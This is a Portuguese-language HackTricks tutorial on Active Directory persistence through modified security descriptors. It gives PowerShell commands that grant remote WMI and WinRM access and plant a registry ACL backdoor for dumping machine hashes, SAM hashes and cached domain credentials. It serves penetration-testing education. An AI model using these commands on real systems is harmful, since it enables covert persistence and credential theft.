Security Descriptors

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

Descritores de Segurança

A partir da documentação: A Linguagem de Definição de Descritor de Segurança (SDDL) define o formato usado para descrever um descritor de segurança. SDDL usa strings ACE para DACL e SACL: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

Os descritores de segurança são usados para armazenar as permissões que um objeto possui sobre um objeto. Se você puder apenas fazer uma pequena alteração no descritor de segurança de um objeto, você pode obter privilégios muito interessantes sobre esse objeto sem precisar ser membro de um grupo privilegiado.

Então, essa técnica de persistência é baseada na capacidade de obter todos os privilégios necessários contra determinados objetos, para poder realizar uma tarefa que geralmente requer privilégios de administrador, mas sem a necessidade de ser administrador.

Acesso ao WMI

Você pode dar a um usuário acesso para executar remotamente o WMI usando isso:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove

Acesso ao WinRM

Permitir acesso à console winrm PS para um usuário usando este:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Acesso remoto a hashes

Acesse o registro e faça dump dos hashes criando um backdoor Reg usando DAMP, para que você possa a qualquer momento recuperar o hash do computador, o SAM e qualquer credencial AD em cache no computador. Portanto, é muito útil conceder essa permissão a um usuário regular contra um computador do Controlador de Domínio:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Verifique Silver Tickets para aprender como você poderia usar o hash da conta de computador de um Controlador de Domínio.

Last updated